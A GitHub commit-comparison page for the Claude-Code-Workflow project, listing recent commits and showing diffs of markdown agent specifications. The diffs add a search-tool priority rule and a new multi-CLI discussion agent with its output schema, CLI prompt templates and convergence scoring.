Compare commits

...

45 Commits

Author SHA1 Message Date
catlog22
c24ed016cb feat: 更新执行命令文档,添加队列ID要求和用户提示功能 2026-01-15 16:22:48 +08:00
catlog22
0c9a6d4154 chore: bump version to 6.3.29
Release 6.3.29 with:
- Multi-CLI task and discussion tabs i18n support
- Collapsible sections for discussion and summary tabs
- Post-Completion Expansion for execution commands
- Enhanced multi-CLI session handling
- Code structure refactoring
2026-01-15 15:38:15 +08:00
catlog22
7b5c3cacaa feat: 添加多CLI任务和讨论标签的国际化支持 2026-01-15 15:35:09 +08:00
catlog22
e6e7876b38 feat: Add collapsible sections and enhance layout for discussion and summary tabs 2026-01-15 15:30:11 +08:00
catlog22
0eda520fd7 feat: Enhance multi-CLI session handling and UI updates
- Added loading of plan.json in scanMultiCliDir to improve task extraction.
- Implemented normalization of tasks from plan.json format to support new UI.
- Updated CSS for multi-CLI plan summary and task item badges for better visibility.
- Refactored hook-manager to use Node.js for cross-platform compatibility in command execution.
- Improved i18n support for new CLI tool configuration in the hook wizard.
- Enhanced lite-tasks view to utilize normalized tasks and provide better fallback mechanisms.
- Updated memory-update-queue to return string messages for better integration with hooks.
2026-01-15 15:20:20 +08:00
catlog22
e22b525e9c feat: add Post-Completion Expansion to execution commands
执行命令完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 /issue:new
2026-01-15 13:00:50 +08:00
catlog22
86536aaa10 Refactor code structure for improved readability and maintainability 2026-01-15 11:51:19 +08:00
catlog22
3ef766708f chore: bump version to 6.3.28
Fixes #74 - Include ccw/scripts/ in npm package files
2026-01-15 11:20:34 +08:00
catlog22
95a7f05aa9 Add unified command indices for CCW and CCW-Help with detailed capabilities, flows, and intent rules
- Introduced command.json for CCW-Help with 88 commands and 16 agents, covering essential workflows and memory management.
- Created command.json for CCW with comprehensive capabilities for exploration, planning, execution, bug fixing, testing, reviewing, and documentation.
- Defined complex flows for rapid iteration, full exploration, coupled planning, bug fixing, issue lifecycle management, and more.
- Implemented intent rules for bug fixing, issue batch processing, exploration, UI design, TDD, review, and documentation.
- Established CLI tools and injection rules to enhance command execution based on context and complexity.
2026-01-15 11:19:30 +08:00
catlog22
f692834153 fix: Status导航项现在正确显示CLI状态页面而非CLAUDE.md管理器
cli-manager视图路由错误调用了renderClaudeManager(),修复为调用正确的renderCliManager()函数。

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-15 10:38:19 +08:00
catlog22
a228bb946b fix: Issue Manager completed过滤器现在可以显示归档议题
- 添加 loadIssueHistory() 函数从 /api/issues/history 加载归档议题
- 修改 filterIssuesByStatus() 在选择 completed 过滤器时加载历史数据
- 修改 renderIssueView() 合并当前已完成议题和归档议题
- 修改 renderIssueCard() 显示 "Archived" 标签区分归档议题
- 修改 openIssueDetail() 支持从缓存加载归档议题详情
- 添加 .issue-card.archived 和 .issue-archived-badge CSS样式

Fixes: https://github.com/catlog22/Claude-Code-Workflow/issues/76

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-15 10:28:52 +08:00
catlog22
4d57f47717 feat: 更新搜索工具优先级指南,统一格式以提高可读性 2026-01-14 22:00:01 +08:00
catlog22
c8cac5b201 feat: 添加搜索工具优先级指南,优化CLI工具调用和执行策略 2026-01-14 21:46:36 +08:00
catlog22
f9c1216eec feat: 添加令牌消耗诊断功能,优化输出和状态管理 2026-01-14 21:40:00 +08:00
catlog22
266f6f11ec feat: Enhance documentation diagnosis and category mapping
- Introduced action to diagnose documentation structure, identifying redundancies and conflicts.
- Added centralized category mappings in JSON format for improved detection and strategy application.
- Updated existing functions to utilize new mappings for taxonomy and strategy matching.
- Implemented new detection patterns for documentation redundancy and conflict.
- Expanded state schema to include documentation diagnosis results.
- Enhanced severity criteria and strategy selection guide to accommodate new documentation issues.
2026-01-14 21:07:52 +08:00
catlog22
1f5ce9c03a Enhance CCW Orchestrator with Requirement Analysis Features
- Updated SKILL.md to reflect new requirement analysis capabilities, including input analysis and clarity scoring.
- Expanded issue workflow in issue.md to include discovery and creation phases, along with detailed command references.
- Introduced requirement analysis specification in requirement-analysis.md, outlining clarity scoring, dimension extraction, and validation processes.
- Added output templates specification in output-templates.md for consistent user experience across classification, planning, clarification, execution, and summary outputs.
2026-01-14 20:15:42 +08:00
catlog22
959d60b31f Enhance CLI Stream Viewer and Navigation Lifecycle Management
- Added lifecycle management for CLI Stream Viewer with destroy function to clean up event listeners and timers.
- Improved navigation state management by registering destroy functions for views and ensuring cleanup on transitions.
- Updated Claude Manager to include lifecycle functions for better resource management.
- Enhanced CLI History View with state reset functionality and improved dropdown handling for batch delete.
- Introduced round solutions rendering in Lite Tasks View, including collapsible sections for implementation plans, dependencies, and technical concerns.
2026-01-14 19:57:05 +08:00
catlog22
49845fe1ae feat: 扩展多CLI详细页面样式,更新任务卡片和决策状态显示 2026-01-14 18:47:23 +08:00
catlog22
aeb111420e feat: 添加多CLI计划支持,更新数据聚合和导航组件以处理新任务类型 2026-01-14 17:06:36 +08:00
catlog22
6ff3e5f8fe test: add unit tests for hook quoting fix (Issue #73)
Add comprehensive test suite for convertToClaudeCodeFormat function:
- Verify bash -c commands use single quotes
- Verify jq patterns are preserved without excessive escaping
- Verify single quotes in scripts are properly escaped
- Test all real-world hook templates (danger-*, ccw-notify, log-tool)
- Test edge cases (non-bash commands, already formatted data)

All 13 tests passing.

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-14 15:22:52 +08:00
catlog22
d941166d84 fix: use single quotes for bash -c script to avoid jq escaping issues
Problem:
When generating hook configurations, the convertToClaudeCodeFormat function
was using double quotes to wrap bash -c script arguments. This caused
complex escaping issues with jq commands inside, leading to parse errors
like "jq: error: syntax error, unexpected end of file".

Solution:
For bash -c commands, now use single quotes to wrap the script argument.
Single quotes prevent shell expansion, so internal double quotes (like
those used in jq patterns) work naturally without excessive escaping.

If the script contains single quotes, they are properly escaped using
the '\'' pattern (close quote, escaped quote, reopen quote).

Fixes: https://github.com/catlog22/Claude-Code-Workflow/issues/73

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-14 15:07:04 +08:00
catlog22
ac9ba5c7e4 feat: 更新CLI分析调用部分,强调等待结果和价值评估,移除背景执行默认设置 2026-01-14 14:00:14 +08:00
catlog22
9e55f51501 feat: 添加需求分析功能,支持维度拆解、覆盖度评估和歧义检测 2026-01-14 13:42:57 +08:00
catlog22
43b8cfc7b0 feat: 添加CLI辅助意图分类和行动规划功能,增强复杂输入处理和执行策略优化 2026-01-14 13:23:22 +08:00
catlog22
633d918da1 Add quality gates and tuning strategies documentation
- Introduced quality gates specification for skill tuning, detailing quality dimensions, scoring, and gate definitions.
- Added comprehensive tuning strategies for various issue categories, including context explosion, long-tail forgetting, data flow, and agent coordination.
- Created templates for diagnosis reports and fix proposals to standardize documentation and reporting processes.
2026-01-14 12:59:13 +08:00
catlog22
6b4b9b0775 feat: enhance multi-CLI planning with new schema for solutions and implementation plans; improve file handling with async methods 2026-01-14 12:15:42 +08:00
catlog22
360d29d7be Enhance server routing to include dialog API endpoints
- Updated system routes in the server to handle dialog-related API requests.
- Added support for new dialog routes under the '/api/dialog/' path.
2026-01-14 10:51:23 +08:00
catlog22
4fe7f6cde6 feat: enhance CLI discussion agent and multi-CLI planning with JSON string support; improve error handling and internationalization 2026-01-13 23:51:46 +08:00
catlog22
6922ca27de Add Multi-CLI Plan feature and corresponding JSON schema
- Introduced a new navigation item for "Multi-CLI Plan" in the dashboard template.
- Created a new JSON schema for "Multi-CLI Discussion Artifact" to facilitate structured discussions and decision-making processes.
2026-01-13 23:46:15 +08:00
catlog22
c3da637849 feat(workflow): add multi-CLI collaborative planning command
- Introduced a new command `/workflow:multi-cli-plan` for collaborative planning using ACE semantic search and iterative analysis with Claude and Codex.
- Implemented a structured execution flow with phases for context gathering, multi-tool analysis, user decision points, and final plan generation.
- Added detailed documentation outlining the command's usage, execution phases, and key features.
- Included error handling and configuration options for enhanced user experience.
2026-01-13 23:23:09 +08:00
catlog22
2f1c56285a chore: bump version to 6.3.27
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 21:51:10 +08:00
catlog22
85972b73ea feat: update CSRF protection logic and enhance GPU detection method; improve i18n for hook wizard templates 2026-01-13 21:49:08 +08:00
catlog22
6305f19bbb chore: bump version to 6.3.26
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 21:33:24 +08:00
catlog22
275d2cb0af feat: Add environment file support for CLI tools
- Introduced a new input group for environment file configuration in the dashboard CSS.
- Updated hook manager to queue CLAUDE.md updates with configurable threshold and timeout.
- Enhanced CLI manager view to include environment file input for built-in tools (gemini, qwen).
- Implemented environment file loading mechanism in cli-executor-core, allowing custom environment variables.
- Added unit tests for environment file parsing and loading functionalities.
- Updated memory update queue to support dynamic configuration of threshold and timeout settings.
2026-01-13 21:31:46 +08:00
catlog22
d5f57d29ed feat: add issue discovery by prompt command with Gemini planning
- Introduced `/issue:discover-by-prompt` command for user-driven issue discovery.
- Implemented multi-agent exploration with iterative feedback loops.
- Added ACE semantic search for context gathering and cross-module comparison capabilities.
- Enhanced user experience with natural language input and adaptive exploration strategies.

feat: implement memory update queue tool for batching updates

- Created `memory-update-queue.js` for managing CLAUDE.md updates.
- Added functionality for queuing paths, deduplication, and auto-flushing based on thresholds and timeouts.
- Implemented methods for queue status retrieval, flushing, and timeout checks.
- Configured to store queue data persistently in `~/.claude/.memory-queue.json`.
2026-01-13 21:04:45 +08:00
catlog22
7d8b13f34f feat(mcp): add cross-platform MCP config support with Windows cmd /c auto-fix
- Add buildCrossPlatformMcpConfig() helper for automatic Windows cmd /c wrapping
- Add checkWindowsMcpCompatibility() to detect configs needing Windows fixes
- Add autoFixWindowsMcpConfig() to automatically fix incompatible configs
- Add showWindowsMcpCompatibilityWarning() dialog for user confirmation
- Simplify recommended MCP configs (ace-tool, chrome-devtools, exa) using helper
- Auto-detect and prompt when adding MCP servers with npx/npm/node/python commands
- Add i18n translations for Windows compatibility warnings (en/zh)

Supported commands for auto-detection: npx, npm, node, python, python3, pip, pip3, pnpm, yarn, bun

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 19:07:11 +08:00
catlog22
340137d347 fix: resolve GitHub issues #63, #66, #67, #68, #69, #70
- #70: Fix API Key Tester URL handling - normalize trailing slashes before
  version suffix detection to prevent double-slash URLs like //models
- #69: Fix memory embedder ignoring CodexLens config - add error handling
  for CodexLensConfig.load() with fallback to defaults
- #68: Fix ccw cli using wrong Python environment - add getCodexLensVenvPython()
  to resolve correct venv path on Windows/Unix
- #67: Fix LiteLLM API Provider test endpoint - actually test API key connection
  instead of just checking ccw-litellm installation
- #66: Fix help-routes.ts path configuration - use correct 'ccw-help' directory
  name and refactor getIndexDir to pure function
- #63: Fix CodexLens install state refresh - add cache invalidation after
  config save in codexlens-manager.js

Also includes targeted unit tests for the URL normalization logic.

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 18:20:54 +08:00
catlog22
61cef8019a chore: bump version to 6.3.25
- Add review-code skill with multi-dimensional code review
- Externalized rules configuration (specs/rules/*.json)
- Centralized state management module

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 17:14:07 +08:00
catlog22
08308aa9ea feat: 增加对 HTML 标签的支持,扩展 BBCode 转换规则 2026-01-13 16:58:24 +08:00
catlog22
94ae9e264c Add output preview phase and callout types specifications
- Implemented Phase 4: Output & Preview for text formatter, including saving formatted content, generating statistics, and providing HTML preview.
- Created callout types documentation with detection patterns and conversion rules for BBCode and HTML.
- Added element mapping specifications detailing detection patterns and conversion matrices for various Markdown elements.
- Established format conversion rules for BBCode and Markdown, emphasizing pixel-based sizing and supported tags.
- Developed BBCode template with structured document and callout templates for consistent formatting.
2026-01-13 16:53:25 +08:00
catlog22
549e6e70e4 chore: bump version to 6.3.24
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 16:01:08 +08:00
catlog22
15514c8f91 Add multi-dimensional code review rules for architecture, correctness, performance, readability, security, and testing
- Introduced architecture rules to detect circular dependencies, god classes, layer violations, and mixed concerns.
- Added correctness rules focusing on null checks, empty catch blocks, unreachable code, and type coercion.
- Implemented performance rules addressing nested loops, synchronous I/O, memory leaks, and unnecessary re-renders in React.
- Created readability rules to improve function length, variable naming, deep nesting, magic numbers, and commented code.
- Established security rules to identify XSS risks, hardcoded secrets, SQL injection vulnerabilities, and insecure random generation.
- Developed testing rules to enhance test quality, coverage, and maintainability, including missing assertions and error path testing.
- Documented the structure and schema for rule files in the index.md for better understanding and usage.
2026-01-13 14:53:20 +08:00
catlog22
29c8bb7a66 feat: Add orchestrator and state management for code review process
- Implemented orchestrator logic to manage code review phases, including state reading, action selection, and execution loop.
- Defined state schema for review process, including metadata, context, findings, and execution tracking.
- Created action catalog detailing actions for context collection, quick scan, deep review, report generation, and completion.
- Established error recovery strategies and termination conditions for robust review handling.
- Developed issue classification and quality standards documentation to guide review severity and categorization.
- Introduced review dimensions with detailed checklists for correctness, security, performance, readability, testing, and architecture.
- Added templates for issue reporting and review reports to standardize output and improve clarity.
2026-01-13 14:39:16 +08:00
catlog22
76f5311e78 Refactor: Remove outdated security requirements and best practice templates
- Deleted security requirements specification file to streamline documentation.
- Removed best practice finding template to enhance clarity and focus on critical issues.
- Eliminated report template and security finding template to reduce redundancy and improve maintainability.
- Updated skill generator templates to enforce mandatory prerequisites for better compliance with design standards.
- Bumped package version from 6.3.18 to 6.3.23 for dependency updates.
2026-01-13 13:58:41 +08:00
catlog22
ca6677149a chore: bump version to 6.3.23
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-13 13:04:49 +08:00
179 changed files with 28989 additions and 9976 deletions

View File

@@ -29,7 +29,13 @@ Available CLI endpoints are dynamically defined by the config file:
```
Bash({ command: "ccw cli -p '...' --tool gemini", run_in_background: true })
```
- **After CLI call**: Stop immediately - let CLI execute in background, do NOT poll with TaskOutput
- **After CLI call**: Stop immediately - let CLI execute in background, do NOT
poll with TaskOutput
### CLI Analysis Calls
- **Wait for results**: MUST wait for CLI analysis to complete before taking any write action. Do NOT proceed with fixes while analysis is running
- **Value every call**: Each CLI invocation is valuable and costly. NEVER waste analysis results:
- Aggregate multiple analysis results before proposing solutions
## Code Diagnostics

View File

@@ -855,6 +855,7 @@ Use `analysis_results.complexity` or task count to determine structure:
### 3.3 Guidelines Checklist
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Apply Quantification Requirements to all requirements, acceptance criteria, and modification points
- Load IMPL_PLAN template: `Read(~/.claude/workflows/cli-templates/prompts/workflow/impl-plan-template.txt)` before generating IMPL_PLAN.md
- Use provided context package: Extract all information from structured context

View File

@@ -0,0 +1,391 @@
---
name: cli-discuss-agent
description: |
Multi-CLI collaborative discussion agent with cross-verification and solution synthesis.
Orchestrates 5-phase workflow: Context Prep → CLI Execution → Cross-Verify → Synthesize → Output
color: magenta
allowed-tools: mcp__ace-tool__search_context(*), Bash(*), Read(*), Write(*), Glob(*), Grep(*)
---
You are a specialized CLI discussion agent that orchestrates multiple CLI tools to analyze tasks, cross-verify findings, and synthesize structured solutions.
## Core Capabilities
1. **Multi-CLI Orchestration** - Invoke Gemini, Codex, Qwen for diverse perspectives
2. **Cross-Verification** - Compare findings, identify agreements/disagreements
3. **Solution Synthesis** - Merge approaches, score and rank by consensus
4. **Context Enrichment** - ACE semantic search for supplementary context
**Discussion Modes**:
- `initial` → First round, establish baseline analysis (parallel execution)
- `iterative` → Build on previous rounds with user feedback (parallel + resume)
- `verification` → Cross-verify specific approaches (serial execution)
---
## 5-Phase Execution Workflow
```
Phase 1: Context Preparation
↓ Parse input, enrich with ACE if needed, create round folder
Phase 2: Multi-CLI Execution
↓ Build prompts, execute CLIs with fallback chain, parse outputs
Phase 3: Cross-Verification
↓ Compare findings, identify agreements/disagreements, resolve conflicts
Phase 4: Solution Synthesis
↓ Extract approaches, merge similar, score and rank top 3
Phase 5: Output Generation
↓ Calculate convergence, generate questions, write synthesis.json
```
---
## Input Schema
**From orchestrator** (may be JSON strings):
- `task_description` - User's task or requirement
- `round_number` - Current discussion round (1, 2, 3...)
- `session` - `{ id, folder }` for output paths
- `ace_context` - `{ relevant_files[], detected_patterns[], architecture_insights }`
- `previous_rounds` - Array of prior SynthesisResult (optional)
- `user_feedback` - User's feedback from last round (optional)
- `cli_config` - `{ tools[], timeout, fallback_chain[], mode }` (optional)
- `tools`: Default `['gemini', 'codex']` or `['gemini', 'codex', 'claude']`
- `fallback_chain`: Default `['gemini', 'codex', 'claude']`
- `mode`: `'parallel'` (default) or `'serial'`
---
## Output Schema
**Output Path**: `{session.folder}/rounds/{round_number}/synthesis.json`
```json
{
"round": 1,
"solutions": [
{
"name": "Solution Name",
"source_cli": ["gemini", "codex"],
"feasibility": 0.85,
"effort": "low|medium|high",
"risk": "low|medium|high",
"summary": "Brief analysis summary",
"implementation_plan": {
"approach": "High-level technical approach",
"tasks": [
{
"id": "T1",
"name": "Task name",
"depends_on": [],
"files": [{"file": "path", "line": 10, "action": "modify|create|delete"}],
"key_point": "Critical consideration for this task"
},
{
"id": "T2",
"name": "Second task",
"depends_on": ["T1"],
"files": [{"file": "path2", "line": 1, "action": "create"}],
"key_point": null
}
],
"execution_flow": "T1 → T2 → T3 (T2,T3 can parallel after T1)",
"milestones": ["Interface defined", "Core logic complete", "Tests passing"]
},
"dependencies": {
"internal": ["@/lib/module"],
"external": ["npm:package@version"]
},
"technical_concerns": ["Potential blocker 1", "Risk area 2"]
}
],
"convergence": {
"score": 0.75,
"new_insights": true,
"recommendation": "converged|continue|user_input_needed"
},
"cross_verification": {
"agreements": ["point 1"],
"disagreements": ["point 2"],
"resolution": "how resolved"
},
"clarification_questions": ["question 1?"]
}
```
**Schema Fields**:
| Field | Purpose |
|-------|---------|
| `feasibility` | Quantitative viability score (0-1) |
| `summary` | Narrative analysis summary |
| `implementation_plan.approach` | High-level technical strategy |
| `implementation_plan.tasks[]` | Discrete implementation tasks |
| `implementation_plan.tasks[].depends_on` | Task dependencies (IDs) |
| `implementation_plan.tasks[].key_point` | Critical consideration for task |
| `implementation_plan.execution_flow` | Visual task sequence |
| `implementation_plan.milestones` | Key checkpoints |
| `technical_concerns` | Specific risks/blockers |
**Note**: Solutions ranked by internal scoring (array order = priority). `pros/cons` merged into `summary` and `technical_concerns`.
---
## Phase 1: Context Preparation
**Parse input** (handle JSON strings from orchestrator):
```javascript
const ace_context = typeof input.ace_context === 'string'
? JSON.parse(input.ace_context) : input.ace_context || {}
const previous_rounds = typeof input.previous_rounds === 'string'
? JSON.parse(input.previous_rounds) : input.previous_rounds || []
```
**ACE Supplementary Search** (when needed):
```javascript
// Trigger conditions:
// - Round > 1 AND relevant_files < 5
// - Previous solutions reference unlisted files
if (shouldSupplement) {
mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: `Implementation patterns for ${task_keywords}`
})
}
```
**Create round folder**:
```bash
mkdir -p {session.folder}/rounds/{round_number}
```
---
## Phase 2: Multi-CLI Execution
### Available CLI Tools
三方 CLI 工具:
- **gemini** - Google Gemini (deep code analysis perspective)
- **codex** - OpenAI Codex (implementation verification perspective)
- **claude** - Anthropic Claude (architectural analysis perspective)
### Execution Modes
**Parallel Mode** (default, faster):
```
┌─ gemini ─┐
│ ├─→ merge results → cross-verify
└─ codex ──┘
```
- Execute multiple CLIs simultaneously
- Merge outputs after all complete
- Use when: time-sensitive, independent analysis needed
**Serial Mode** (for cross-verification):
```
gemini → (output) → codex → (verify) → claude
```
- Each CLI receives prior CLI's output
- Explicit verification chain
- Use when: deep verification required, controversial solutions
**Mode Selection**:
```javascript
const execution_mode = cli_config.mode || 'parallel'
// parallel: Promise.all([cli1, cli2, cli3])
// serial: await cli1 → await cli2(cli1.output) → await cli3(cli2.output)
```
### CLI Prompt Template
```bash
ccw cli -p "
PURPOSE: Analyze task from {perspective} perspective, verify technical feasibility
TASK:
• Analyze: \"{task_description}\"
• Examine codebase patterns and architecture
• Identify implementation approaches with trade-offs
• Provide file:line references for integration points
MODE: analysis
CONTEXT: @**/* | Memory: {ace_context_summary}
{previous_rounds_section}
{cross_verify_section}
EXPECTED: JSON with feasibility_score, findings, implementation_approaches, technical_concerns, code_locations
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) |
- Specific file:line references
- Quantify effort estimates
- Concrete pros/cons
" --tool {tool} --mode analysis {resume_flag}
```
### Resume Mechanism
**Session Resume** - Continue from previous CLI session:
```bash
# Resume last session
ccw cli -p "Continue analysis..." --tool gemini --resume
# Resume specific session
ccw cli -p "Verify findings..." --tool codex --resume <session-id>
# Merge multiple sessions
ccw cli -p "Synthesize all..." --tool claude --resume <id1>,<id2>
```
**When to Resume**:
- Round > 1: Resume previous round's CLI session for context
- Cross-verification: Resume primary CLI session for secondary to verify
- User feedback: Resume with new constraints from user input
**Context Assembly** (automatic):
```
=== PREVIOUS CONVERSATION ===
USER PROMPT: [Previous CLI prompt]
ASSISTANT RESPONSE: [Previous CLI output]
=== CONTINUATION ===
[New prompt with updated context]
```
### Fallback Chain
Execute primary tool → On failure, try next in chain:
```
gemini → codex → claude → degraded-analysis
```
### Cross-Verification Mode
Second+ CLI receives prior analysis for verification:
```json
{
"cross_verification": {
"agrees_with": ["verified point 1"],
"disagrees_with": ["challenged point 1"],
"additions": ["new insight 1"]
}
}
```
---
## Phase 3: Cross-Verification
**Compare CLI outputs**:
1. Group similar findings across CLIs
2. Identify multi-CLI agreements (2+ CLIs agree)
3. Identify disagreements (conflicting conclusions)
4. Generate resolution based on evidence weight
**Output**:
```json
{
"agreements": ["Approach X proposed by gemini, codex"],
"disagreements": ["Effort estimate differs: gemini=low, codex=high"],
"resolution": "Resolved using code evidence from gemini"
}
```
---
## Phase 4: Solution Synthesis
**Extract and merge approaches**:
1. Collect implementation_approaches from all CLIs
2. Normalize names, merge similar approaches
3. Combine pros/cons/affected_files from multiple sources
4. Track source_cli attribution
**Internal scoring** (used for ranking, not exported):
```
score = (source_cli.length × 20) // Multi-CLI consensus
+ effort_score[effort] // low=30, medium=20, high=10
+ risk_score[risk] // low=30, medium=20, high=5
+ (pros.length - cons.length) × 5 // Balance
+ min(affected_files.length × 3, 15) // Specificity
```
**Output**: Top 3 solutions, ranked in array order (highest score first)
---
## Phase 5: Output Generation
### Convergence Calculation
```
score = agreement_ratio × 0.5 // agreements / (agreements + disagreements)
+ avg_feasibility × 0.3 // average of CLI feasibility_scores
+ stability_bonus × 0.2 // +0.2 if no new insights vs previous rounds
recommendation:
- score >= 0.8 → "converged"
- disagreements > 3 → "user_input_needed"
- else → "continue"
```
### Clarification Questions
Generate from:
1. Unresolved disagreements (max 2)
2. Technical concerns raised (max 2)
3. Trade-off decisions needed
**Max 4 questions total**
### Write Output
```javascript
Write({
file_path: `${session.folder}/rounds/${round_number}/synthesis.json`,
content: JSON.stringify(artifact, null, 2)
})
```
---
## Error Handling
**CLI Failure**: Try fallback chain → Degraded analysis if all fail
**Parse Failure**: Extract bullet points from raw output as fallback
**Timeout**: Return partial results with timeout flag
---
## Quality Standards
| Criteria | Good | Bad |
|----------|------|-----|
| File references | `src/auth/login.ts:45` | "update relevant files" |
| Effort estimate | `low` / `medium` / `high` | "some time required" |
| Pros/Cons | Concrete, specific | Generic, vague |
| Solution source | Multi-CLI consensus | Single CLI only |
| Convergence | Score with reasoning | Binary yes/no |
---
## Key Reminders
**ALWAYS**:
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Execute multiple CLIs for cross-verification
2. Parse CLI outputs with fallback extraction
3. Include file:line references in affected_files
4. Calculate convergence score accurately
5. Write synthesis.json to round folder
6. Use `run_in_background: false` for CLI calls
7. Limit solutions to top 3
8. Limit clarification questions to 4
**NEVER**:
1. Execute implementation code (analysis only)
2. Return without writing synthesis.json
3. Skip cross-verification phase
4. Generate more than 4 clarification questions
5. Ignore previous round context
6. Assume solution without multi-CLI validation

View File

@@ -65,6 +65,8 @@ Score = 0
## Phase 2: Context Discovery
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
**1. Project Structure**:
```bash
ccw tool exec get_modules_by_depth '{}'

View File

@@ -165,7 +165,8 @@ Brief summary:
## Key Reminders
**ALWAYS**:
1. Read schema file FIRST before generating any output (if schema specified)
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Read schema file FIRST before generating any output (if schema specified)
2. Copy field names EXACTLY from schema (case-sensitive)
3. Verify root structure matches schema (array vs object)
4. Match nested/flat structures as schema requires

View File

@@ -428,6 +428,7 @@ function validateTask(task) {
## Key Reminders
**ALWAYS**:
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Read schema first** to determine output structure
- Generate task IDs (T1/T2 for plan, FIX1/FIX2 for fix-plan)
- Include depends_on (even if empty [])

View File

@@ -436,6 +436,7 @@ See: `.process/iteration-{iteration}-cli-output.txt`
## Key Reminders
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Validate context package**: Ensure all required fields present before CLI execution
- **Handle CLI errors gracefully**: Use fallback chain (Gemini → Qwen → degraded mode)
- **Parse CLI output structurally**: Extract specific sections (RCA, 修复建议, 验证建议)

View File

@@ -389,6 +389,7 @@ Before completing any task, verify:
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Verify module/package existence with rg/grep/search before referencing
- Write working code incrementally
- Test your implementation thoroughly

View File

@@ -27,6 +27,8 @@ You are a conceptual planning specialist focused on **dedicated single-role** st
## Core Responsibilities
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
1. **Dedicated Role Execution**: Execute exactly one assigned planning role perspective - no multi-role assignments
2. **Brainstorming Integration**: Integrate with auto brainstorm workflow for role-specific conceptual analysis
3. **Template-Driven Analysis**: Use planning role templates loaded via `$(cat template)`

View File

@@ -565,6 +565,7 @@ Output: .workflow/session/{session}/.process/context-package.json
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS**:
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Initialize CodexLens in Phase 0
- Execute get_modules_by_depth.sh
- Load CLAUDE.md/README.md (unless in memory)

View File

@@ -10,6 +10,8 @@ You are an intelligent debugging specialist that autonomously diagnoses bugs thr
## Tool Selection Hierarchy
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
1. **Gemini (Primary)** - Log analysis, hypothesis validation, root cause reasoning
2. **Qwen (Fallback)** - Same capabilities as Gemini, use when unavailable
3. **Codex (Alternative)** - Fix implementation, code modification

View File

@@ -311,6 +311,7 @@ Before completing the task, you must verify the following:
## Key Reminders
**ALWAYS**:
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Detect Mode**: Check `meta.cli_execute` to determine execution mode (Agent or CLI).
- **Follow `flow_control`**: Execute the `pre_analysis` steps exactly as defined in the task JSON.
- **Execute Commands Directly**: All commands are tool-specific and ready to run.

View File

@@ -308,7 +308,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS**:
1. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
2. Use ACE semantic search as PRIMARY exploration tool
3. Fetch issue details via `ccw issue status <id> --json`
4. Quantify acceptance.criteria with testable conditions

View File

@@ -275,7 +275,8 @@ Return brief summaries; full conflict details in separate files:
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS**:
1. Build dependency graph before ordering
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Build dependency graph before ordering
2. Detect file overlaps between solutions
3. Apply resolution rules consistently
4. Calculate semantic priority for all solutions

View File

@@ -75,6 +75,8 @@ Examples:
## Execution Rules
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
1. **Task Tracking**: Create TodoWrite entry for each depth before execution
2. **Parallelism**: Max 4 jobs per depth, sequential across depths
3. **Strategy Assignment**: Assign strategy based on depth:

View File

